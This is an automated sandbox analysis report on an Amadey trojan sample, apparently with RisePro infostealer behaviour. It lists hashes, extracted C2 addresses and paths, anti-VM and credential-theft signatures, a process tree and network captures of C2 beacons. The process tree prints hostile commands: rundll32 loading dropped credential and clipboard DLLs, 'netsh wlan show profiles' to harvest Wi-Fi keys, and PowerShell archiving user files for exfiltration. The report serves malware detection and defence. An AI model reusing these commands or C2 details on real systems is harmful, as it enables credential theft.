Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240426-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27/04/2024, 17:07 UTC

General

  • Target

    acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe

  • Size

    1.8MB

  • MD5

    3129fec389a088955fae72aa12b20ef0

  • SHA1

    e4cc27027754574a6abdf0010333930016b37fb5

  • SHA256

    acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75

  • SHA512

    918ac19261d99d7ea7cc92bdf6e72a8caff90eb6241c650fe95cf0230bce9af8bc52231c0a7452244b88b6024b0061351520e57400952e4bf4191e67bc8139e9

  • SSDEEP

    49152:r3/bnfCUYZWGdSbS36Q5DTFpcL4Mne/qMFZQK:rjnf2vFpcL1uFZ

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://193.233.132.139

Attributes
  • install_dir

    5454e6f062

  • install_file

    explorta.exe

  • strings_key

    c7a869c5ba1d72480093ec207994e2bf

  • url_paths

    /sev56rkm/index.php

  • rc4.plain (entry 1)

    006700e5a2ab05704bbb0c589b88924d

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

  • rc4.plain (entry 1)

    c1ec479e5342a25940592acf24703eb2

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 60 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
    "C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3136
    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
      "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
        "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
        3⤵
          PID:2332
      • C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
        "C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4812
      • C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe
        "C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
          4⤵
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2364
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaef08ab58,0x7ffaef08ab68,0x7ffaef08ab78
            5⤵
            PID:2500
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
            5⤵
            PID:2740
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:952
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:3500
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
            5⤵
            PID:4916
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
            5⤵
            PID:1680
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
            5⤵
            PID:4924
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3264 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
            5⤵
            PID:4664
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3328 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:2708
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            • Modifies registry class
            PID:1584
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:4244
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:1840
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:3276
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:2176
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:528
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
            5⤵
            PID:3048
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3248
      • C:\Users\Admin\1000017002\13ee951efa.exe
        "C:\Users\Admin\1000017002\13ee951efa.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:2272
  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
    1⤵
    PID:3568
  • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3068
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
      2⤵
      • Loads dropped DLL
      PID:1712
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        PID:4968
        • C:\Windows\system32\netsh.exe
          netsh wlan show profiles
          4⤵
          PID:2484
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3520
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      PID:1044
  • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:2484
  • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Executes dropped EXE
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    PID:3428

                                      Network

                                      • flag-us
                                        DNS
                                        g.bing.com
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        g.bing.com
                                        IN A
                                        Response
                                        g.bing.com
                                        IN CNAME
                                        g-bing-com.dual-a-0034.a-msedge.net
                                        g-bing-com.dual-a-0034.a-msedge.net
                                        IN CNAME
                                        dual-a-0034.a-msedge.net
                                        dual-a-0034.a-msedge.net
                                        IN A
                                        204.79.197.237
                                        dual-a-0034.a-msedge.net
                                        IN A
                                        13.107.21.237
                                      • flag-us
                                        GET
                                        https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
                                        Remote address:
                                        204.79.197.237:443
                                        Request
                                        GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
                                        host: g.bing.com
                                        accept-encoding: gzip, deflate
                                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                        Response
                                        HTTP/2.0 204
                                        cache-control: no-cache, must-revalidate
                                        pragma: no-cache
                                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                                        set-cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; domain=.bing.com; expires=Thu, 22-May-2025 17:07:29 GMT; path=/; SameSite=None; Secure; Priority=High;
                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                        access-control-allow-origin: *
                                        x-cache: CONFIG_NOCACHE
                                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        x-msedge-ref: Ref A: 693888A47EF44E92B03D25D90D7D9BF1 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:29Z
                                        date: Sat, 27 Apr 2024 17:07:29 GMT
                                      • flag-us
                                        GET
                                        https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
                                        Remote address:
                                        204.79.197.237:443
                                        Request
                                        GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
                                        host: g.bing.com
                                        accept-encoding: gzip, deflate
                                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                        cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312
                                        Response
                                        HTTP/2.0 204
                                        cache-control: no-cache, must-revalidate
                                        pragma: no-cache
                                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                                        set-cookie: MSPTC=5kAXrMywdhLn16yyUT0Rj-ACdIrO-_FBZkgY3G-ae6E; domain=.bing.com; expires=Thu, 22-May-2025 17:07:30 GMT; path=/; Partitioned; secure; SameSite=None
                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                        access-control-allow-origin: *
                                        x-cache: CONFIG_NOCACHE
                                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        x-msedge-ref: Ref A: 9D807B57F5A04C778A641BE2280068F6 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:30Z
                                        date: Sat, 27 Apr 2024 17:07:30 GMT
                                      • flag-nl
                                        GET
                                        https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893
                                        Remote address:
                                        23.62.61.194:443
                                        Request
                                        GET /aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893 HTTP/2.0
                                        host: www.bing.com
                                        accept-encoding: gzip, deflate
                                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                        cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA
                                        Response
                                        HTTP/2.0 200
                                        cache-control: private,no-store
                                        pragma: no-cache
                                        vary: Origin
                                        p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
                                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        x-msedge-ref: Ref A: 350BA4A5571A486D803814C7B9FBA84B Ref B: AMS04EDGE2718 Ref C: 2024-04-27T17:07:30Z
                                        content-length: 0
                                        date: Sat, 27 Apr 2024 17:07:30 GMT
                                        set-cookie: _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312; path=/; httponly; domain=bing.com
                                        set-cookie: MUIDB=39284F0CA7EB6DE029235B62A60B6CFA; path=/; httponly; expires=Thu, 22-May-2025 17:07:30 GMT
                                        alt-svc: h3=":443"; ma=93600
                                        x-cdn-traceid: 0.be3d3e17.1714237650.112e0ca5
                                      • flag-us
                                        DNS
                                        8.8.8.8.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        Response
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        dnsgoogle
                                      • flag-us
                                        DNS
                                        237.197.79.204.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        237.197.79.204.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        73.159.190.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        73.159.190.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        240.221.184.93.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        240.221.184.93.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        95.221.229.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        95.221.229.192.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        194.61.62.23.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        194.61.62.23.in-addr.arpa
                                        IN PTR
                                        Response
                                        194.61.62.23.in-addr.arpa
                                        IN PTR
                                        a23-62-61-194.deploy.static.akamaitechnologies.com
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 4
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Refresh: 0; url = Login.php
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 158
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:41 GMT
